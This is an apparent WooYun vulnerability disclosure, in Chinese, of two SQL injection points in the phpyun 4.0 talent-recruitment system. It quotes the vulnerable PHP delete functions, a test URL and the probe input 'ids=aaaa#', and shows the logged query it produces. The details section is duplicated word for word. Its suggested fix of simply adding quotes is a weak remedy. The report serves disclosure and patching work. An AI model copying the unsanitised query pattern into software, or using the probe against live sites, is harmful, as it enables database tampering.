当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144424

漏洞标题:phpyun最新版两处注入(无视gpc)

相关厂商:php云人才系统

漏洞作者: Xser

提交时间:2015-10-05 17:42

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-05: 细节已通知厂商并且等待厂商处理中
2015-10-06: 厂商已经确认,细节仅向厂商公开
2015-10-09: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

PHP云人才系统 phpyun v4.0正式版 build20150819
4.0已经重新改版了,别在用3.2和4.0比较

详细说明:

第一处出现在
/member/com/model/show.class.php中
3.2版本的源码是

function delshow_action(){
$company_show=$this->obj->DB_select_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'","`picurl`");
if(is_array($company_show)&&$company_show){
foreach($company_show as $val){
$this->obj->unlink_pic(".".$val['picurl']);
}
$this->obj->DB_delete_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'","");
}
return true;
}


以下是4.0的

function delshow_action(){ $ids=$_POST['ids']; $company_show=$this->obj->DB_select_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`"); if(is_array($company_show)&&$company_show){ foreach($company_show as $val){ unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'",""); $this->obj->member_log("删除企业环境展示"); } return true;

POST来的值直接带入查询,没有单引号,所以可以注入 试试带入字符看看是否可以 url

http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow

postdata

ids=aaaa#

QQ截图20151001141515.png

成功带入

2015/10/1 14:14	SELECT `picurl` FROM `phpyun_company_show` WHERE `id` in (aaaa#) and `uid`='1'


第二处出现在/member/user/model/show.class.php中
第二处改的比较明显
3.2是用GET方法获取del参数
但是4.0改用了POST的方法获取,但是没有过滤
3.2的

$delid=$_GET['del'];//GET的del没有过滤,传给delid


4.0的

$ids=$_POST['ids']


以下是3.2源码

function job(){
。。。
570行 if($_GET['del'] || is_array($_POST['checkboxid']))
{
if(is_array($_POST['checkboxid'])){
$layer_type=1;
$delid=$this->pylode(",",$_POST['checkboxid']);
}else if($_GET['del']){
$layer_type=0;
$delid=$_GET['del'];//GET的del没有过滤,传给delid
}
$rows=$this->obj->DB_select_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")","`state`");
$nid=$this->obj->DB_delete_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")"," ");
echo $nid;
$this->obj->DB_delete_all("company_job_link","`uid`='".$this->uid."' and `jobid` in (".$delid.")"," ");
。。。
}


以下是4.0的

function delshow_action(){ $ids=$_POST['ids']; $resume_show=$this->obj->DB_select_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`"); if(is_array($resume_show)&&$resume_show){ foreach($resume_show as $val){ unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'",""); $this->obj->member_log("删除作品案例"); } return true;

POST来的值直接带入查询,没有单引号,所以可以注入 试试带入字符看看是否可以 url

http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow

postdata

ids=aaaa#

QQ截图20151001135656.png

可以看到成功带入

2015/10/1 13:56	SELECT `picurl` FROM `phpyun_resume_show` WHERE `id` in (aaaa#) and `uid`='2'


漏洞证明:

第一处出现在
/member/com/model/show.class.php中
3.2版本的源码是

function delshow_action(){
$company_show=$this->obj->DB_select_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'","`picurl`");
if(is_array($company_show)&&$company_show){
foreach($company_show as $val){
$this->obj->unlink_pic(".".$val['picurl']);
}
$this->obj->DB_delete_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'","");
}
return true;
}


以下是4.0的

function delshow_action(){ $ids=$_POST['ids']; $company_show=$this->obj->DB_select_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`"); if(is_array($company_show)&&$company_show){ foreach($company_show as $val){ unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'",""); $this->obj->member_log("删除企业环境展示"); } return true;

POST来的值直接带入查询,没有单引号,所以可以注入 试试带入字符看看是否可以 url

http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow

postdata

ids=aaaa#

QQ截图20151001141515.png

成功带入

2015/10/1 14:14	SELECT `picurl` FROM `phpyun_company_show` WHERE `id` in (aaaa#) and `uid`='1'


第二处出现在/member/user/model/show.class.php中
第二处改的比较明显
3.2是用GET方法获取del参数
但是4.0改用了POST的方法获取,但是没有过滤
3.2的

$delid=$_GET['del'];//GET的del没有过滤,传给delid


4.0的

$ids=$_POST['ids']


以下是3.2源码

function job(){
。。。
570行 if($_GET['del'] || is_array($_POST['checkboxid']))
{
if(is_array($_POST['checkboxid'])){
$layer_type=1;
$delid=$this->pylode(",",$_POST['checkboxid']);
}else if($_GET['del']){
$layer_type=0;
$delid=$_GET['del'];//GET的del没有过滤,传给delid
}
$rows=$this->obj->DB_select_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")","`state`");
$nid=$this->obj->DB_delete_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")"," ");
echo $nid;
$this->obj->DB_delete_all("company_job_link","`uid`='".$this->uid."' and `jobid` in (".$delid.")"," ");
。。。
}


以下是4.0的

function delshow_action(){ $ids=$_POST['ids']; $resume_show=$this->obj->DB_select_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`"); if(is_array($resume_show)&&$resume_show){ foreach($resume_show as $val){ unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'",""); $this->obj->member_log("删除作品案例"); } return true;

POST来的值直接带入查询,没有单引号,所以可以注入 试试带入字符看看是否可以 url

http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow

postdata

ids=aaaa#

QQ截图20151001135656.png

可以看到成功带入

2015/10/1 13:56	SELECT `picurl` FROM `phpyun_resume_show` WHERE `id` in (aaaa#) and `uid`='2'


修复方案:

改为"`id` in ('".$ids."')
加入单引号就可以了

版权声明:转载请注明来源 Xser@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-06 13:25

厂商回复:

感谢提供,我们会尽快修复!

最新状态:

暂无